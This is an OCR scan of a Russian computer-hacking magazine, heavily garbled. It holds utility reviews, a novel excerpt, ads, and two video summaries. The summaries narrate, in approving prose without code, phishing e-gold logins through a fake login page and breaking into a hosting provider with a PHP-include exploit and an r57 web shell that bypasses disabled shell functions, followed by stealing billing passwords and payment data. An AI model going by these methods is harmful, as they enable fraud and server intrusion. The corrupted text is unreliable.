ти наблюдение. И это при первом запуске! В ином случае можно 
либо открыть файл проекта (да, программа позволяет и сохранять 
все собранные данные и настройки), либо же выбрать СарШге в 
меню. Там тебе предстоит или указать файл, который будет авто- 
матически запущен, или же установить/убрать галочки напротив 
опций типа «Саріиге Арріісаііоп зіагіеб \л/Ші 1Не ѴѴіпбоѵѵз Эезкіор», 
то есть при запуске очередного приложения утилита будет просить 
разрешения произвести слежку :). В общем, ТгасеРІиз32 — вещь 
номер один на столе исследователя. 




Представь, что ты нечаянно удалил 15 гигов отборных немецких 
фильмов, которые разрешают смотреть только с 1 8-ти лет.. М-да, 
плохой пример. Или вот: ты удалил курсовой проект и теперь уже 
чистишь кирзовые сапоги? А быть может, ты разработал програм- 
му, которая удаляет файлы без возможности восстановления, и 
тебе хочется протестировать ее на деле? Т огда закачай программу 
для восстановления удаленных данных — Асііѵе@ Рііе Весоѵегу. 
Почему именно ее? У программы есть одна очень важная функ- 
ция — восстановление удаленных файлов, и делает это она пора- 
зительно! Конечно, сразу расскажу об ограничении бесплатной 
демо-версии. Это ограничение на восстановление файла, разме- 
ром больше 32-х килобайт. Ноты всегда можешь купить утилиту, не 
так ли? Когда зарегистрируешь программу, сможешь ощутить всю 
ее прелесть. Скажу сразу: меня программа привела в восторг, ког- 
да я смог восстановить СаІІ 01 Эіііу — ІІпіІесІ ОІІепсе, которая была 
удалена уже больше месяца назад (заметь, винчестер не простаи- 
вал, а был в эксплуатации). Качать или не качать — решать тебе. 



Ведізігу ѴѴазИег 3.3.5 

ѴѴіп 9х/І\ІТ/2к/ХР 
ЗИагеѴѴаге 
Зіге: 3 Мб 

ѵѵѵѵѵѵ.гідНІиІіІШез.согп 

Ты, наверное, наслышан про различные утилиты для работы с 
реестром ѴѴіпсІоѵѵз. И думаешь, что удивить тебя в этой сфере бу- 
дет трудно? Да, конечно, если ты пользуешься утилитой Редізігу 
ѴѴазНег, то можешь даже не читать, что написано далее. Если нет, 
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то, думаю, эта программа скоро завоюет и твое сердце. 

Утилита предназначена для очистки реестра от всякого мусора. 
Вот, например, сканировать реестр на ошибки умеют все, но де- 
лают это довольно неуклюже, а в случае Ведізігу ѴѴазНег можно 
выбрать конкретные секции для анализа. Зачем, например, ис- 
следовать весь реестр, если нужно только проверить ассоциации, 
присвоенные для различных файловых расширений? Просто вы- 
бираем нужный пункт — Рііе Ехіепзіопз — ижмем «Зіагізсап». Со- 
здать бэкап реестра, в принципе, можно и через обычный гедебіі. 
Но создавать его вручную, причем каждый раз, — вообще не ва- 
риант. Куда удобнее дать соответствующее указание встроенно- 
му в Ведізігу ѴѴазИег планировщику. Все знают, насколько коряв 
Іпіегпеі Ехріогег. Каждый месяц новые эксплойты и прочая зараза 
так и норовят использовать его для своих корыстных целей. Чес- 
тно говоря, я был немного удивлен, когда Ведізігу ѴѴазИег показал 
мне список компонентов, привязанных к моему ослику. Пускай 
ІЕ я и не юзаю, но факт остается фактом: несколько непонятных 
ООІ_ активно с ним взаимодействуют. К счастью, с помощью этой 
тулзы я быстро удалил эту гадость. Теперь понимаешь все плюсы 
данной программы? Если так, то забирай с диска ил и скорее качай 
из Интернета! 



ІЧ.Е.ѴѴ.Т. Рго 2.0 



ѴѴіп 9х/І\ІТ/2к/ХР 
ЗНагеѴѴаге 
Зіге: 3,8 Мб 

ѵѵѵѵѵѵ. котобосі ідііаі . сот 












Помню целый год работал я системным администратором в неболь- 
шой конторе (всего 40 машин). Конечно же, проблем особых не 
возникало, но не хватало утилиты администрирования всей сети. 
Сперва я пользовался радмином. Представляешь, как было не- 
удобно? Потом открыл для себя ОатеѴѴаге, но о ней мы уже писа- 
ли, да и разбираться в многочисленных настройках было лень. Как 
жаль, что тогда я не открыл для себя действительно хорошую про- 
грамму для дистанционного мониторинга локальной сети, которая 
имеет приятный интерфейс, проста в настройке и удобна в работе. 
Имя этому замечательному помощнику системного администрато- 
ра ІЧЕѴѴТ Рго. С ее помощью ты разом получишь около двухсот па- 
раметров о каждой машине в сети (машины можно сканировать по 
диапазону ІР-адресов, данным Асііѵе Оігесіогу и т.д.), и эти данные 
будут постоянно обновляться. Чтобы понять, насколько наглядно 
эти данные будут представлены, ознакомься со скриншотом. Ду- 
маю, все вопросы разрешатся сами собой. 



Аренда виртуального 
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ВОРУЕМ Е-СОЬР 



В этом видео автор показывает, как с помощью 
нехитрого скрипта, имитирующего работу логин- 
страницы ѵ\ллл/ѵ.е-доІсІ.сот, можно увести у аме- 
риканского толстосума его честно заработан- 
ный лавандос. Завладев этим комплектом 
скриптов, ЗТОВМ начинает решительные 
действия. Для начала составим и отправим под- 
дельное письмо некому гражданину Карлу 
Джонсону Жэ Эр. Карл наверняка не самый бед- 
ный на земле человек, поэтому он просто обязан 
поделиться с бедным украинским хакером. Кон- 
верт ушел к ламеру — осталось только дождать- 
ся результата. Наивный американец, не задумы- 
ваясь, кликнул на ссылку в письме и ввел свои 
реквизиты для входа в аккаунт е-доІсГа. Шторму 
удалось получить доступ к акку, на котором ока- 
залось 50 долларов. Но чтобы перевести деньги 
себе, необходимо завладеть мылом владельца, 
на который придет код активации для разреше- 
ния перевода. Внимание! В процессе съемки ро- 
лика ни один не пострадал. Ролик снимали нас- 
тоящие Робин Гуды, которые вернули деньги и 
принесли извинения в письменной форме. 



ХАКНУТЫЙ ХОСТИНГ 



Однажды хакеру потребовался хостинг для 
своего нового замысла (а хакерам довольно 
часто требуются хостинги для своих замыс- 
лов). Платить денежки за такие услуги он жут- 
ко не любил, поэтому намеривался просто 
скардить себе аккаунт на одном из буржуйс- 
ких серверов. Зайдя на сайт хостинг провай- 
дера, этот любопытный человек сразу же по- 
сетил тамошний форум, чтобы прочитать от- 
зывы клиентов об услугах. Глаза, по привычке, 
опустились вниз, к версии форума. Она была 
довольно-таки старой. Возникла мысль, что 
это развод админа для малолетних кидисов, но 
интуиция подсказывала обратное. Для этого 
форума существует много эксплойтов, поэто- 
му у хакера был реальный шанс осуществить 
взлом. Злодей решил воспользоваться до- 
вольно старым эксплойтом, который никогда 
не появлялся в публичных источниках (разра- 
ботчик закрыл уязвимость без лишнего шума). 
Суть атаки заключалась в хитроумной подме- 
не переменной гооІщэаіИ, благодаря которой 
становился возможным рНр- 



іпсіисіе. Загруженный г57зНеІІ имеет ши- 
рокие возможности обхода ограничений 
на выполнения команд. Поэтому, несмот- 
ря на запрет функций зИеІІ_ехес(), 
раззІІіги(), зуз1ет(), хакер спокойно мог выпол- 
нять команды через рореп(). На сервере был 
установлен І_іпих с крепким ядром 2.4.30- 
дгзес, так что вариант получения гооі-прав 
ядерным сплоитом отпал сразу. Но взломщи- 
ка это не испугало: он умел доставать нужную 
ему инфу даже при минимальных правах в 
системе. В каталоге выше он стал просматри- 
вать скрипты на идентификационных данных. 
Отыскав логин и пароль для доступа к биллин- 
гу, хакер увел оттуда все интересные данные, 
включая пароли к серверам хостинга, аккаун- 
ты юзеров и данные оплаты услуг. Внимание! 
Не воспринимай видео как инструкцию к быст- 
рому обогащению, ок? 
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В КАЖДОМ НОМЕРЕ 
ОѴС С ЛУЧШИМ 
ФУТБОЛЬНЫМ 
КОНТЕНТОМ 



В НАЙТ КОН НОМЕРЕ: 
ЧН-2ГОЕ - В ГЕРМАНИИ 

{.П0ДИОЧИНЯ 4ю Ы.ѴН сбари-ын, 
М I* [іС'і.ЛИ И Г(М^рчІН 

ЭКСКЛЮЗИВ 

ШДДЗ-гДикІМй-Ф А.і'іин-.н Гі СнЛртии. 
ЗОи^ч №і верпуЛСй нВ ЕК'іДмну- 

СУПЕРИРАТАРЙ 

Яйндил КОйа/4ВСйн пшбпі Ми-: ■‘йу.-і 
Яаннл Чи-іі-.'іфіілгн^ч н -Пнцр 

НОВЫ? ТРЕНЕРЫ 

ІІ Г. л н |> 1*1 Ю й- Р.уіЛнч - і лЛРкііиііінн^ь, 

Бладм;ч нр Вай« - « іСаГурнй-» 

ТЕНА НОМЕРА 

ІѴС ХИДДИНК. НУЖЕН! ЛИ СБОРНОЙ 
і'ОССИИ ЭТОТ ИНОСТРАНЕЦ? 

ФУТБОЛЬНЫЙ МЕНЕДЖЕР 
Главный гірна - і л «ие-іДр.а на финал 
Лиги чН-иІІийнНі! 






ТАБА ЦИКЛОН 

АРРЮАСНІЫ(ЗІ_ЕѴЕІ_5: ПАПАША ГРЕЗ 
Иллюстратор Иван Величко 



Мы продолжаем публиковать отрывки 
из лесбийского стриптиз-романа Дани 
Шеповалова «Таба Циклон». 

Подробности наѵѵѵѵѵѵ.сіапѵа.ги. 

— Бред какой-то! - сказал Папаша Г рез, ког- 
да монета в копилке Тимы в очередной раз 
увернулась от лезвия столового ножа. 

Рядом на кровати лежала уже довольно при- 
личная горсть никеля, на утреннюю кружку 
пива не хватало всего пять рублей. 

— Бред какой-то! - повторил Папаша. 

От нудной работы, требовавшей большой 
концентрации внимания, у него болела спина, 
хотелось выгнуться до хруста в позвонках, вы- 
тереть пот со лба. 

Нож снова скользнул по узкой щели, ободрал 
краску с гипса. Мимо. Опять мимо. Наконец, 
монета поддалась. Папаша аккуратно поста- 
вил копилку на полку, чтобы Тима ничего не 
заподозрил. Каждый шаг давался с трудом: 
казалось, что мозг за ночь усох и теперь пла- 
вает, дрейфует внутри черепной коробки, 
болезненно ударяясь о ее стенки, давит на 
лоб, когда Папаша смотрел себе под ноги. На 
крыльце в глазаемуударил резкий солнечный 
свет. Папаша поморщился: до спасительной 
кружки пива нужно было сделать еще очень 
много шагов. Он обернулся, чтобы закрыть за 
собой дверь. 

«ДобропожАд». Что за чушь? А, очередное 
послание от племянницы. Папаша попытался 
сфокусировать взгляд на ярко-красных бук- 
вах. «Добро пожаловать в Ад! Не очень трез- 
вый гид лежит в соседней комнате. Рита» . 

— Бред какой-то, - сказал Папаша. 

В глубине души он побаивался Риты. Конечно, 
хорошо, чтоесть, комуприсмотретьзасыном, 
но слишкомужТим без умаот девчонки. Взять 
хотя бы эту треклятую фотографию. Смотрит 
на нее часами, когда Риты нет дома, хотя 
есть на что полюбоваться. Ее единственный 
снимок (и почему она не любит фотографи- 
роваться?). Выпускной класс, они стоят на 
каких-то ступеньках, но Рита смотрит не в ка- 
меру, а куда-то вдаль, и так она не похожа на 
своих одноклассников и одноклассниц, что 
все вокруг сливаются в одно пятно. А у нее на 
лице такое выражение, словно она плевать 
хотела на все на свете, будто ей известно что- 
то такое, чего не знает больше никто. 

Папаша тяжело вздохнул, отворяя калитку. 
Если у него, испитого мужика с седой щети- 
ной, одна фотография этой 17-летней де- 
вчонки вызывает подобные эмоции, то что же 
тогда творится в голове у мечтателя Тимы? Он 
снова вздохнул. Однако на улице тревожные 
мысли немедленно покинули Папашу, усту- 
пив место настоящему потрясению. «Ешкин 
Кот» был закрыт! Более того, рабочие в пере- 
пачканных известью спецовках, чертыхаясь, 
снимали тяжелую вывеску, а сквозь витрину 
уже не было видно ни барной стойки, ни зна- 
комых до слез утренних завсегдатаев - лишь 
удручающая, навое готовая пустота, похожая 
на брошенную женщину, да голые стены, воз- 
ле которых возились со своими лестницами и 
ведрами бессердечные маляры. 

Папаша Грез не покидал пределы квартала 
уже второй год: мир, начинавшийся за пе- 
рекрестком, не то чтобы пугал его - он был 
попросту невозможен, невыносим. А без ут- 
ренней порции алкоголя, даже оставшийся 
от него маленький островок стремительно 
терял свои совместимые с жизнью свойс- 
тва. В холодильнике, правда, стояла бутылка 
шампанского, которую Папаше как лучшему 
клиенту подарили на Новый год в ломбарде. 



Но эта розовая газированная жидкость была 
настолько мерзкой на вкус, что его мутило при 
одном лишь воспоминании о роковой этикет- 
ке. 

— Бред какой-то, - вздохнул Папаша и напра- 
вился к миловидной девушке в деловом сером 
костюме, которая внимательно следила за 
действиями рабочих. 

— Кхм, - кашлянул он, тактично стараясь ды- 
шать ниже линии ее подбородка. -Миледи, вы 
не подскажете, где тут ближайший кабак? 
Девушка равнодушно посмотрела куда-то 
мимо его глаз: 

— Ничем не могу вам помочь. 

— Согласен, - кивнул Папаша. - Чертовски 
верное замечание, - добавил он уже тише, 
направляясь назад к дому. 

Слова его утонули в грохоте - двое загорелых, 
мускулистых рабочих в ярких комбинезонах 
прикатили к бару компрессор, и теперь один 
из них отбойным молотком вгрызался в жар- 
кий асфальт, а другой, совсем еще молодой 
парень, ломом расширял ползущие трещи- 
ны. Стоял уже конец сентября, однако солнце 
изливалось на землю с такой безудержной 
щедростью, что жители окрестных домов по 
одному выбирались на улицу, захватив с со- 
бой покрывала, и распологались на газоне, 
не обращая внимания на шум компрессора. 
Иногда рабочие делали перекур: тогда в дро- 
жащем от знойного марева воздухе воцаря- 
лась тишина и было слышно лишь, как где-то 
вдали ухала штука, забивающая сваи: гулкие 
м ерные удары -дууудж-туу... долгая выжида- 
ющая пауза -дууудж-туу. 

Под этот однообразный мотив городской 
окраины бесшумно прикатил автобус, из ко- 
торого выбрались Тима с Ритой. Папаша уже 
возился где-то в глубине двора. 

— С каких это пор у него появился галстук? 
-спросила Рита. 

— Это не галстук, - пояснил Тима, - это ре- 
мень. Он на нем повеситься хочет. 

Папаша Грез действительно сделал на ко- 
жаном ремне петлю и просунул в нее голову. 
Свободный конец он перекинул через трубу и 
теперь с силой тянул его вниз, видимо, пыта- 
ясь вздернуть сам себя. 

В гостиной Рита выдвинула из-за телевизора 
большую коробку со старым хламом и приня- 
лась там что-то искать. Наконец, выудила со 
дна видеокассету и показала ее Тиме. 

— Твоя мама выкинула эту кассету, - сказала 
девушка, - а я подобрала и спрятала, записы- 
вала потом... Ну, всякие свои штуки записы- 
вала. Неважно! Сейчас, тут надо перемотать. 
Лучше отвернись. Или ладно, я в невидимом 
режиме. Вот, 28-я минута. . . 

На экране появляется скачущее изображе- 
ние: болотные сапоги, затем брезентовая 
куртка, чья-то рука держит две удочки, камера 
переворачивается - появляется лицо Кита на 
фоне соснового леса. 

— А сейчас очередная сцена документально- 
го блокбастера «Мой брат - кретин ! » , - гово- 
рит он в камеру, которую держит в руке - Ре- 
жиссер и оператор - Кит Г рез. В главной роли 

— звезда экрана, любимец бабушек, повели- 
тель зассаных матрасов, наш дражайший и 
несравненный Тима Г рез. 

Камера вновь переворачивается, вокруг 
мелькают сосны, сухая хвоя на земле, рябя- 
щая зелень папоротников. Тим идет вперед, 
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сгибаясь под тяжестью огромного бревна, 
которое он зачем-то несет на плечах. 

— Тим, будьте так любезны, расскажите на- 
шим зрителям, зачем вам это бревно?- спра- 
шивает Кит, строя из себя телерепортера. 

— Отвали! 

— Ну серьезно, зачем вы тащите его уже... 

— Кит снова разворачивает камеру, чтобы 
продемонстрировать, как он смотрит на часы, 
-уже полтора часа!? 

— Надо! - сердито бросает Тима. - Я буду де- 
лать тотем! 

— Тотем?! 

— Священный тотем! 

— Ага. Насколько я понимаю, Священный то- 
тем должен защитить вас от Таба Циклона? 
-Да! 

— А что такое Т аба Циклон? 

— Я не знаю. 

— Простите за бестактный вопрос, а нельзя 
было найти бревно для Священного тотема, 
который защитит вас неизвестно от чего. . . ну, 
скажем, найти его чуть поближе к дому? 

— Нельзя! Нужно именно это бревно! 

— Разумеется! Вопросов больше нет. 

Тима проходит между двумя деревьями, и 
бревно застревает. Ему бы просто отойти 
назад и развернуться, пройти боком, но 
он, покрасневший от злости, лезет вперед. 
Бревно глухо ударяется о стволы молодень- 
ких сосен, сдирая с них золотисто-коричне- 
вую кору. 

— Интеллект моего брата может поначалу 
потрясти неподготовленного зрителя, - ком- 
ментирует сцену Кит. 

Бревно действительно должно было быть ко- 
роче раза в два, чтобы Тиме удалось пройти 
между соснами, но он упорно рвется вперед, 
не желая обходить препятствие. 

По экрану телевизора идут помехи, изоб- 
ражение проносится кадрами снизу-вверх. 
Появляется какое-то большое неясное пятно 
телесного цвета. 

— Так, этонето, это не смотри, -Рита поспеш- 
но нажимает на ЗТОР, перематывает назад. 

— Бред какой-то, - доносится из коридора 
привычная Папашина присказка. 

Следом в гостиной появляется и он сам. Во рту 

— дымящаяся сигарета, в руках - практически 
пустая бутылка шампанского с коричневой 
этикеткой, вина там осталось на 2 — 3 глотка. 
Столбик пепла ломается у основания сигаре- 
ты и под грузом собственной тяжести падает 
на ковер, прихватив с собой тлеющие остатки 
табака. 

— А, так вы значит домауже, - Папаша замол- 
кает, глядя, как от красного уголька по ков- 
ру начинает расползаться дымящийся ожог. 

— Знаете, ребята, я тут подумал... 

— Что подумал, пап? 

— Я? А, ну да, я тут подумал... Раз уж я все 
равно ник черту не гожусь, то надо бы вам хоть 
заработать на мне денег. 

— И каким же образом?- спрашивает Рита. 

— Очень просто. Вам надо застраховать мою 
жизнь. 

Папаша Г рез допивает розовое шампанское 
прямо из горла, морщится и ставит пустую бу- 
тылку на пол рядом с телевизором. 

— Дядя Ром, ты не обижайся, но тебя согла- 
сятся застраховать, если тебя только НЛО 
украдет, - говорит Рита. 

— Ну да, - кивает Папаша. - Бред какой-то. . . 
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П.АТКСШ Р700Р 



Абсолютно плоский экран 
Размер точки 0,24 мм 
Частота развертки 95 кГц 
Экранное разрешение 1600x12 
ІІ$В-интерфейс 



ОіпаѴіСопа 



«»5) 68К-61-І7. 6**-2?-65 

\ѵѵѵѵѵ пѵгомр.гш 



Москва: АБ-групп (095) 745-51 75; Акситек (095) 784-7224; Банкос (095) 1 28-9022; ДЕЛ (095) 250-5536; Дилайн (095) 969-2222; Инкотрейд (095) 1 76-2873; ИНЭЛ (095) 742-6436; Карин (095) 956-1 1 58 
Компьютерный салон 5М5 (095) 956-1225; Компания КИТ (095) 777-6655; Никс (095) 974-3333; 0ЛДИ (095) 105-0700; Регард (095) 912-4224; Сетевая Лаборатория (095) 784-6490 
СКИД (095) 232-3324; Тринити Электронике (095) 737-8046; Формоза (095) 234-2164; Ф-Центр (095) 472-6104; ЭЛСТ (095) 728-4060; РІаке (095) 236-992; Рогсе Сотриіегз (095) 775-6655 
ІЗМ (095) 718-4020; Меі]іп (095) 727-1222; N7 Сотриіег (095) 970-1930; Рі-$іуІе Тгасііпд (095) 514-1414; Ю Сотриіегз (095) 755-8202; ІЛ.ТКА Сотриіегз (095) 729-5255; ЭЛЕКТОН (095) 956-3819 
ПортКом (095)777-0210; Архангельск: Северная Корона (8182) 653-525; Волгоград: Техком (8612) 699-850; Воронеж: Рет (0732) 779-339; РИАН (0732) 512-412; Сани (0732) 54-00-00 
Иркутск: Билайн (3952) 240-024; Комтек (3952) 258-338; Краснодар: Игрек (8612) 699-850; Лабытнанги: КЦ ЯМАЛ (34992) 51777; Липецк: Регард-тур (0742) 485-285 
Новосибирск: Квеста (38322) 332-407; Нижний Новгород: Бюро-К (8312) 422-367; Пермь: Гаском (8612) 699-850; Ростов-на-Дону: Зенит-Компьютер (8632) 950-300 
Тюмень: ИНЭКС-Техника (3452) 390-036. 






Повысьте эффективность работы 
и ускорьте развитие своей компании 



Универсальный сервер Маіог, на базе процессора 
ІліеІ® Хеоп® поможет Вам повыситьэффективность 
труда сотрудников и в более полной мере удовлетворять 

желания и потребности клиентов . 




Вся продукция сертифицирована 
(РОСС РУ. МЕ61.В01302) 



Заказ серверов: 



Подробная информация на сайте: ѵѵѵѵѵѵ.ехсііапсі.ги 

и по телефону: (495) 727-0231 



КОРПОРАТИВНЫЙ ОТДЕЛ: 

(495) 727-0231; е-таіі: Ь2Ь@ехсіІапсі.ги 



и е-таіІ:іпТо@ехсіІап<±ги ѵѵѵѵѵѵ.ехсііапсі.ги е-таіІ:іп1Ъ@ехсіІап<±ги ѵѵѵѵѵѵ.ехсііапсі.ги е-таіІ:іпТо@ехсіІап<±ги ѵѵѵѵѵѵ.ехсііапсі.ги е-таіІ:і 



Обозначения Сеіегоп, Сеіегоп Іпзісіе, Сепігіпо, Сепігіпо Іодо, Іпіеі, Іпіеі Соге, ІпіеІ Іодо, Іпіеі Іпзісіе, Іпіеі Іпзісіе Іодо, Іпіеі ЗреебЗІер, ІпіеІ Ѵііѵ, Іп*еІ Хеоп, Капіит, Иапіит Іпзісіе, Соге Іпзісіе, 
Репііит и Репйит Іпзісіе являются товарными знаками, либо зарегистрированными товарными знаками, права на которые принадлежат корпорации ІпіеІ или ее подразделениям на 
территории США и других стран. 





